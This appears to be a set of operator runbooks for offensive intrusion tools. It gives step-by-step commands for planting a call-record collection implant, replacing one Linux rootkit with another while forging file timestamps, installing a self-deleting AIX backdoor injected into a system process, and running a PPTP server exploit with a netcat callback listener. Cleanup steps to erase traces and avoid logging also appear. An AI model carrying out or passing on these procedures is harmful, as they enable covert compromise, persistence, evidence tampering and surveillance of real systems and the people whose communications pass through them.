## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
## cp adm1 adm2
## cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_fwd.enc IMPLANT_HIDDEN_DIRECTORY/erf/e
cf
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erf
L='-I ecf -k CRYPTKEY'; export L; ./nscd
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## forward ENEMYRUN_PROCESS_NAME
## pid: ER_PID
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
## logs IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>Log.*
## hits IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/<prefix>.*
-ls -R erf
-ls -R IMPLANT_HIDDEN_DIRECTORY/erf
##
## once all required ER instances are running, you're done
##
-cd /tmp
-burnBURN
##
## decrypt parsed CDRs locally
##
## single aux* directory
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erb
## and/or
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/final
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.tx
t -k CRYPTKEY -d -c -b ; done
## multiple aux* directories
mkdir /current/down/coll
cp /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*/aux*/output/final/* /cu
rrent/down/coll
cd /current/down/coll
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.tx
t -k CRYPTKEY -d -c -b ; done
##
## copy decrypted data to media / remove ER tar from /current/down
##
ls -la *.txt
mz
cp *.txt /mnt/zip*/PROJECTNAME
ls -la /mnt/zip*/PROJECTNAME
uz
rm /current/down/er_*.tar
############
## DEPLOY ##
############
##
## edit ER configuration files
##
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_b
wd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_f
wd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## encrypt CURSEHAPPY definition file if using CURSEHAPPY
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl
-i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -la
file /current/up/cursedefs/*.enc
##
## put up directories and tools only if deploying ENEMYRUN
## this means only put up these files/tools if they are not on the target yet
## if you have the least doubt about what you're doing, find someone who knows
##
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
-put /current/down/er_PROJECTNAME/erb_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erb.tar
tar xvf erb.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erb
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erb
/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTO
RY/erb/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erb/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erb/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erb/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/er
b/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erb.tar
## -------------- ##
## FORWARDS FILES ##
## -------------- ##
-put /current/down/er_PROJECTNAME/erf_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erf.tar
tar xvf erf.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erf
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erf
/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTO
RY/erf/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erf/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/
erf/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erf/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/er
f/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erf.tar
##
## to continue the setup process go to the COLLECT section item titled:
## "edit ER configuration files"
##
###
### END File user.tool.enemyrun.COMMON
### (see also ../etc/user.tool.enemyrun.COMMON)
###
### BEGIN File user.tool.linux_remove_in_install_ss.COMMON (see also ../etc/us
er.tool.linux_remove_in_install_ss.COMMON)
###
### Upgrading a Linux Incision to a Stoicsurgeon
### Step 1: Trigger Incision or -elevate
### Step 2: Save timestamps of affected files/directories
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/beforetimes
### Step 3: Upload dittlelight
-put /current/up/hidelite.linux h
### Step 4: Need a nopen callback window to use dittlelight (will not
### work on any pids with parents that aren't 1, and callback
### windows do that)
-nrtun PORT
-call REDIR_IP:PORT
### Step 5: In the callback window, get your PID (and make sure the
### PPID is 1
-pid
### Step 6: Unhide your callback window
./h -u -p CALLBACK_PID
### Step 7: Make sure you are unhidden by comparing process listings
### and directory listings, and there should be differences
ps -ef | grep sendmail
-lt /dev/ttyi*
### Step 8: In unhidden window, trigger Incision self-destruct
touch /dev/ttyia3
### Step 9: Repeat step 7, except now instead of being different,
### the two windows should now be the same because Incision
### is gone, so everything is unhidden
ps -ef | grep sendmail
-lt /dev/ttyi*
### Step 10: Remove file we touched/"created"
-rm /dev/ttyia3
### Step 11: At this point, follow the "user.tool.stoicsurgeon"
### script in /current/etc to install Stoicsurgeon
### Step 12: Once Stoicsurgeon is installed, restore timestamps
### for the files/dirs affected by the Incision uninstall
### These are saved in "/current/down/beforetimes" from Step 2
### NOTE: If "-ctrl" does not work, upload and run the standalone
### "Ctrl" program, computing the SEED variable as described
### in the "user.tool.stoicsurgeon" script if needed, or
### you can trigger and not need the SEED
-ctrl -s /sbin/init ATIME 0 MTIME 0 CTIME 0
-ctrl -s /sbin ATIME 0 MTIME 0 CTIME 0
-ctrl -s /dev ATIME 0 MTIME 0 CTIME 0
### Step 13: Confirm timestamps are restored
### This is a bit tricky to see that everything is right, so
### confirm that:
### 1. everything for /sbin should match (i.e. no diff line)
### 2. there should be no /dev/ttyia* files in aftertimes
### 3. /dev may not match exactly if there were changes, but
### /dev can change a lot so not a huge deal
### 4. the timestamps for /sbin/init should be the same in
### beforetimes and aftertimes
### 5. the inode field (8th field in stat output) from
### /dev/ttyia1 in beforetimes should match inode field
### from /sbin/init in aftertimes
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/aftertimes
-lsh diff /current/down/beforetimes /current/down/aftertimes
### All done!$###$
###
### END File user.tool.linux_remove_in_install_ss.COMMON
### (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON)
###
### BEGIN File user.tool.slyheretic.COMMON (see also ../etc/user.tool.slyheret
ic.COMMON)
###
#########################################################
# SLYHERETIC v1.0.5.0
#########################################################
### SLYHERETIC is a light-weight implant for AIX 5.1 and AIX 5.2 Uses Hide-in-Pl
ain-Sight techniques to provide stealth.
### SlyHeretic_Persistent: This installer injects a backdoor into a system proce
ss and persists across system reboots.
### SlyHeretic_OneShot: This installer injects a backdoor into a system process
and does not persist across system reboots.
### All SLYHERETIC binaries delete themselves upon execution.
**IMPORTANT: SINCE SLYHERETIC Uses Hide-in-Plain-Sight techniques to provide ste
alth ensure that you get off of box if known administrators are on the box.**
**IMPORTANT: Do not install SLYHERETIC on systems where TripWire is installed. *
**********************************
######################################################### Persistent Install####
##################################################################
## To install the Persistent version of SLYHERETIC perform the following steps.
## Upload the SlyHeretic_Persistent binary to the target with the name 'date' on
a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Persistent date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The
installer will report a 'date' string with the
## seconds field as the error code. If the seconds field reports '00', the insta
llation was successful.
If you get an error code in the seconds field start the troubleshooting. The mos
t common error that you might receive is the '09' error.
This error means that no viable injection process is available at that particuli
ar time installation time. SLYHERETIC checks the process state prior to
injecting so it may determine that no process are good candiates for injection.
Wait a minute and try the install again. If that does not work contact
tool champion or developer.
########################################################## OneShot Install######
####################################################################
## Upload the SlyHeretic_OneShot binary to the target with the name 'date' on a
filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_OneShot date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The
installer will report a 'date' string with the
## seconds field as the error code. If the seconds field reports '00', the insta
llation was successful.
If you get an error code in the seconds field start the troubleshooting. The mos
t common error that you might receive is the '09' error.
This error means that no viable injection process is available at that particuli
ar time installation time. SLYHERETIC checks the process state prior to
injecting so it may determine that no process are good candiates for injection.
Wait a minute and try the install again. If that does not work contact
tool champion or developer.
#############################################################Uninstalling SLYHER
ETIC######################################################################
## Upload the SlyHeretic_Uninstaller binary to the target with the name 'date' o
n a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Uninstaller date
### Execute the installer with the following command:
PATH=. date
The Uninstaller will not provide any out stating that the uninstall was successf
ul.
To verify uninstall you can attempt to trigger via tipoff or -irtun.
#########################################################SLYHERETIC REINSTALL###
#########################################################################
SLYHERETIC can be reinstalled on a system but only after an Uninstall has taken
place. A reinstall is simply the following steps:
Uninstall SLYHERETIC
Install SLYHERETIC
###
### END File user.tool.slyheretic.COMMON
### (see also ../etc/user.tool.slyheretic.COMMON)
###
### BEGIN File user.tool.entrymanor.COMMON (see also ../etc/user.tool.entryman
or.COMMON)
###
###################################################
### ENTRYMANOR entrymanor binary: xp_pptpd
###################################################
2008-01-15 08:15:21 EST
Usage: ./xp_pptpd -i <pptp_server> -p <pptp_port> -l <localip> -r <localport>
-i target
-p port <default: 1723>
-l local IP
-r local port
-v verify server
-t timeout in seconds <default: 1 sec>
-s stack location <default starts at 0xbfffff00 and ends at 0xbfff0000>
-h help
-d debug
Check:
./xp_pptpd -i 127.0.0.1 -p 1723 -v
Then:
nc -vv -l -p 5492
./xp_pptpd -i 127.0.0.1 -p 1723 -l 555.1.2.22 -r 5492
###
### END File user.tool.entrymanor.COMMON
### (see also ../etc/user.tool.entrymanor.COMMON)
#### BAIL
-cd /tmp/socket-root
-cd ..
-ls
rm -rf /tmp/socket-root
-ls
#### AT JOB (CAREFUL! These can log.)
at -l
at -r ATJOB
at -l
-burn
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root